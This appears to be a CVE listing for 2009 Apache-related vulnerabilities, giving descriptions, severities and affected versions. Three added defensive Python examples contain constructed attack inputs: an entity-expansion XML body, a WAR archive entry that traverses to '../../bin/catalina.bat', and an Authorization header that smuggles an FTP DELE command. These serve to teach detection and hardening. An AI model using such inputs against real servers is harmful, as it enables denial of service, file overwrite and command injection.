apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2009-0783 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2009-0796 LOW

Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache mod_perl 2
apache mod_perl 1
CVE-2009-1191 MEDIUM

mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
canonical ubuntu_linux 9.04
apache http_server 2.2.11
CVE-2009-1195 MEDIUM

The Apache HTTP Server 2.2.11 and earlier 2.2 versions do not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server 2.2.10
apache http_server *
apache http_server -
apache http_server 2.2.7
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
CVE-2009-1197 MEDIUM

Apache jUDDI before 2.0 allows attackers to spoof entries in log files via vectors related to error logging of keys from uddiget.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache juddi 0.9
apache juddi 2.0
CVE-2009-1198 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache jUDDI before 2.0 allows remote attackers to inject arbitrary web script or HTML via the dsname parameter to happyjuddi.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache juddi *
CVE-2009-1890 HIGH

The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
debian debian_linux 4.0
redhat enterprise_linux_eus 5.3
redhat enterprise_linux_server 5.0
redhat enterprise_linux_server_aus 5.3
fedoraproject fedora 11
CVE-2009-1891 HIGH

The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
debian debian_linux 4.0
redhat enterprise_linux_eus 5.3
redhat enterprise_linux_server 5.0
redhat enterprise_linux_server_aus 5.3
fedoraproject fedora 11
CVE-2009-1955 MEDIUM

The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache apr-util *
apache http_server *
canonical ubuntu_linux 8.10
apple mac_os_x *
oracle http_server -
suse linux_enterprise_server 9
canonical ubuntu_linux 9.04
fedoraproject fedora 10
fedoraproject fedora 9
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
debian debian_linux 4.0
fedoraproject fedora 11
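The attack in CVE-2009-1955 is the classic "billion laughs": a handful of nested internal entity declarations in a PROPFIND body that expand to gigabytes inside the parser. The expansion size can be computed from the declarations alone, without expanding anything, which is what the added Python example below does. It is written for this page and is not APR-util's, mod_dav's or expat's code; the sample PROPFIND body, the one-megabyte limit and the function names are constructed for illustration. Rejecting entity declarations outright is the simplest fix for a WebDAV endpoint, which never needs them; the sizing check below is for places where entities must be allowed but bounded.

```python
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.-]*)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.-]*);')
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}   # each expands to a single character

# Constructed sample: a PROPFIND body with four levels of tenfold entity nesting.
# Four levels already expand to 30,000 characters; the classic attack uses nine or ten.
SAMPLE_PROPFIND = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE propfind [\n'
    '<!ENTITY lol0 "lol">\n'
    + "".join('<!ENTITY lol%d "%s">\n' % (i, ("&lol%d;" % (i - 1)) * 10) for i in range(1, 5))
    + ']>\n'
    '<D:propfind xmlns:D="DAV:"><D:prop><D:displayname>&lol4;</D:displayname></D:prop></D:propfind>\n'
)


def split_internal_subset(doc: str):
    """Return (internal DTD subset, rest of the document after the DOCTYPE)."""
    m = re.search(r'<!DOCTYPE[^\[>]*(?:\[(.*?)\])?\s*>', doc, re.S)
    if not m:
        return "", doc
    return m.group(1) or "", doc[m.end():]


def expansion_sizes(internal_subset: str) -> dict:
    """Fully expanded size of each internal entity, computed without expanding anything."""
    decls = dict(ENTITY_DECL.findall(internal_subset))
    sizes = {}

    def size(name, stack):
        if name in stack:
            raise ValueError("recursive entity " + name)
        if name not in sizes:
            body = decls[name]
            total = len(ENTITY_REF.sub("", body))          # literal characters
            for ref in ENTITY_REF.findall(body):            # plus each reference, expanded
                if ref in decls:
                    total += size(ref, stack + (name,))
                elif ref in PREDEFINED:
                    total += 1
                else:
                    raise ValueError("undefined entity " + ref)
            sizes[name] = total
        return sizes[name]

    for name in decls:
        size(name, ())
    return sizes


def expanded_length(doc: str) -> int:
    """Length of the document content once every entity reference is expanded."""
    subset, body = split_internal_subset(doc)
    sizes = expansion_sizes(subset)
    total = len(ENTITY_REF.sub("", body))
    for ref in ENTITY_REF.findall(body):
        if ref in sizes:
            total += sizes[ref]
        elif ref in PREDEFINED:
            total += 1
        else:
            raise ValueError("undefined entity " + ref)
    return total


def reject_xml_body(doc: str, limit: int = 1_000_000) -> bool:
    """True if the request body should be refused before it reaches the XML parser:
    it would expand beyond `limit` characters, or its entity graph is malformed or cyclic."""
    try:
        return expanded_length(doc) > limit
    except ValueError:
        return True


if __name__ == "__main__":
    print("lol4 expands to", expansion_sizes(split_internal_subset(SAMPLE_PROPFIND)[0])["lol4"], "chars")
    print("reject sample at 10k limit:", reject_xml_body(SAMPLE_PROPFIND, limit=10_000))
```

Run this on the body before handing it to the parser; the cost is linear in the size of the DTD, whereas the parser's cost is linear in the expanded size, which is exactly the asymmetry the attacker exploits.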
CVE-2009-1956 MEDIUM

Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache apr-util *
apache http_server *
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
canonical ubuntu_linux 9.04
CVE-2009-2412 HIGH

Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache apr-util 0.9.9
apache portable_runtime 1.3.6
apache apr-util 1.3.4-dev
apache apr-util 0.9.3
apache apr-util 0.9.3-dev
apache portable_runtime 0.9.2-dev
apache apr-util 1.3.5
apache portable_runtime 0.9.2
apache portable_runtime 0.9.1
apache portable_runtime 1.3.7
apache apr-util 0.9.7-dev
apache portable_runtime 0.9.5
apache portable_runtime 0.9.7
apache portable_runtime 0.9.9
apache portable_runtime 1.3.5
apache apr-util 1.3.4
apache apr-util 1.3.7
apache apr-util 1.3.2
apache portable_runtime 0.9.3
apache apr-util 0.9.16
apache apr-util 1.3.0
apache apr-util 0.9.8
apache apr-util 1.3.1
apache portable_runtime 1.3.3
apache apr-util 1.3.6-dev
apache apr-util 0.9.6
apache apr-util 1.3.6
apache portable_runtime 1.3.4-dev
apache apr-util 0.9.2
apache portable_runtime 0.9.7-dev
apache portable_runtime 0.9.3-dev
apache portable_runtime 1.3.1
apache apr-util 0.9.2-dev
apache apr-util 1.3.8
apache apr-util 1.3.3
apache portable_runtime 1.3.0
apache apr-util 0.9.1
apache portable_runtime 0.9.4
apache portable_runtime 1.3.2
apache portable_runtime 0.9.6
apache apr-util 0.9.5
apache portable_runtime 1.3.6-dev
apache portable_runtime 1.3.8
apache portable_runtime 0.9.8
apache apr-util 0.9.4
apache portable_runtime 1.3.4
apache portable_runtime 0.9.16-dev
CVE-2009-2625 MEDIUM

XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
suse linux_enterprise_server 11
apache xerces2_java 2.9.1
suse linux_enterprise_server 9
oracle jdk 1.5.0
canonical ubuntu_linux 9.04
oracle primavera_p6_enterprise_project_portfolio_management 6.2.1
oracle primavera_web_services 6.2.1
fedoraproject fedora 10
opensuse opensuse 11.2
oracle primavera_p6_enterprise_project_portfolio_management 7.0
opensuse opensuse 11.1
suse linux_enterprise_server 10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
debian debian_linux 4.0
oracle primavera_p6_enterprise_project_portfolio_management 6.1
opensuse opensuse 11.0
oracle jdk 1.6.0
fedoraproject fedora 11
canonical ubuntu_linux 9.10
oracle primavera_web_services 7.0
CVE-2009-2693 MEDIUM

Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2009-2696 MEDIUM

Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2009-2699 MEDIUM

The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server *
apache portable_runtime *
CVE-2009-2901 MEDIUM

The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2009-2902 MEDIUM

Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
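CVE-2009-2693 and CVE-2009-2902 above are two faces of the same mistake in a deployer: trusting names taken from an archive. In the first, an entry name such as ../../bin/catalina.bat is expanded relative to the application directory and writes outside it; in the second, the WAR file name ...war strips to the context name .., so the "work directory for this context" resolves to the parent, which is then deleted. The Python below is an added example for this page, not Tomcat's ExpandWar or deployer code; the sample WAR, the entry names and the function names are constructed for illustration. It builds a WAR containing the traversal entry from the advisory, shows the name-level and realpath-level checks an expander needs, and derives the context name with the same refusal applied to the file name.

```python
import io
import os
import posixpath
import tempfile
import zipfile


def build_sample_war() -> bytes:
    """Constructed sample: one legitimate entry plus the traversal entry from the advisory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("../../bin/catalina.bat", "@echo owned")
    return buf.getvalue()


def safe_entry_name(name: str) -> bool:
    """Archive entry names must stay inside the expansion directory.

    Rejects empty names, absolute paths, backslash separators, drive prefixes and any
    name whose normalized form climbs above the starting directory.
    """
    if not name or name.startswith("/") or "\\" in name:
        return False
    if ":" in name.split("/", 1)[0]:          # 'C:...' style drive prefix
        return False
    norm = posixpath.normpath(name)
    return norm != ".." and not norm.startswith("../")


def unsafe_entries(war_bytes: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        return [n for n in zf.namelist() if not safe_entry_name(n)]


def expand_war(war_bytes: bytes, dest: str):
    """Expand a WAR, writing only entries whose real path stays under dest.

    The realpath comparison is the authoritative check; safe_entry_name() is a cheap
    pre-filter that also gives a readable reason for the rejection.
    """
    dest = os.path.realpath(dest)
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest, info.filename))
            if not safe_entry_name(info.filename) or os.path.commonpath([dest, target]) != dest:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written, rejected


def context_name(war_filename: str):
    """Context (and work-directory) name a deployer derives from a WAR file name.

    Returns None for names such as '...war', whose base name is '..', and for
    anything containing a path separator.
    """
    if not war_filename.endswith(".war"):
        return None
    base = war_filename[: -len(".war")]
    if base in ("", ".", "..") or "/" in base or "\\" in base:
        return None
    return base


def demo():
    """Expand the sample WAR into a scratch directory and report what was written and refused."""
    with tempfile.TemporaryDirectory() as tmp:
        return expand_war(build_sample_war(), tmp)


if __name__ == "__main__":
    print("written, rejected:", demo())
    print("context for '...war':", context_name("...war"))
```

Python's own ZipFile.extractall already strips such components, which is why hand-rolled extractors (and anything that computes a directory name from an archive name) are where this bug keeps reappearing; the realpath-under-destination test is the check to copy, and the name prefilter is there so the rejection log says why.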
CVE-2009-2949 HIGH

Integer overflow in the XPMReader::ReadXPM function in filter.vcl/ixpm/svt_xpmread.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to execute arbitrary code via a crafted XPM file that triggers a heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-2950 HIGH

Heap-based buffer overflow in the GIFLZWDecompressor::GIFLZWDecompressor function in filter.vcl/lgif/decode.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted GIF file, related to LZW decompression.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3094 LOW

The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.

CVSS 2.0

Severity: LOW

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 5.0
fedoraproject fedora 12
debian debian_linux 4.0
fedoraproject fedora 10
CVE-2009-3095 MEDIUM

The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
suse linux_enterprise_server 11
apple mac_os_x *
fedoraproject fedora 12
suse linux_enterprise_server 9
fedoraproject fedora 10
opensuse opensuse 11.1
suse linux_enterprise_server 10
debian debian_linux 4.0
suse linux_enterprise_desktop 10
opensuse opensuse 10.3
opensuse opensuse 11.0
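CVE-2009-3095 is command injection into a line-based protocol: mod_proxy_ftp takes the user and password from the client's Basic Authorization header and writes them into USER and PASS lines on the FTP control connection, so a CR/LF inside either credential terminates the line early and the remainder is parsed by the FTP server as further commands. The Python below is an added example for this page and not httpd's proxy code; the attack header, the DELE command it smuggles and the function names are constructed for illustration. It parses the header the way a proxy would, shows the unguarded command stream beside the hardened one, and renders what the FTP server actually sees.

```python
import base64

CRLF = "\r\n"


def credentials_from_authorization(header: str):
    """Parse 'Basic <base64(user:pass)>' into (user, password); None for anything else."""
    scheme, _, blob = header.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(blob, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def ftp_login_vulnerable(user: str, password: str) -> str:
    """Credentials dropped straight into the command stream: CR/LF in either splits it."""
    return "USER " + user + CRLF + "PASS " + password + CRLF


def free_of_control_chars(value: str) -> bool:
    """True if the value cannot terminate or inject an FTP command line."""
    return not any(c in value for c in "\r\n\0")


def ftp_login_fixed(user: str, password: str):
    """Same exchange, but returns None (refuse the request) when a credential could inject a command."""
    if not (free_of_control_chars(user) and free_of_control_chars(password)):
        return None
    return "USER " + user + CRLF + "PASS " + password + CRLF


def ftp_commands(stream: str) -> list:
    """What the FTP server parses: one command per CRLF-terminated line."""
    return [line for line in stream.split(CRLF) if line]


# Constructed attack header: the 'password' carries a third command after the PASS line.
ATTACK_HEADER = "Basic " + base64.b64encode(b"anonymous:guest\r\nDELE important.txt").decode("ascii")
BENIGN_HEADER = "Basic " + base64.b64encode(b"anonymous:guest").decode("ascii")


if __name__ == "__main__":
    user, password = credentials_from_authorization(ATTACK_HEADER)
    print("server sees (vulnerable):", ftp_commands(ftp_login_vulnerable(user, password)))
    print("hardened proxy sends:    ", ftp_login_fixed(user, password))
```

The same rule covers every protocol the proxy speaks on the client's behalf: any byte that the downstream parser treats as a delimiter must be rejected (or encoded, where the protocol offers an encoding) before attacker-controlled data is written to the wire.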
CVE-2009-3301 HIGH

Integer underflow in filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTDefTable table property modifier in a Word document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-191,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3302 HIGH

filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a "boundary error flaw."

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3548 HIGH

The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache tomcat 4.1.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 4.1.4
apache tomcat 4.1.13
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 3.0
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 5.0.26
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 4.1.8
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.18
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 5.5.4
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 5.0.2
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 4.1.17
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.22
apache tomcat 5.0.13
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 3.2.1
apache tomcat 4.1.38
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.1
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 5.5.3
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 6.0.17
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.21
apache tomcat 4.1.21
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.1
CVE-2009-3555 MEDIUM

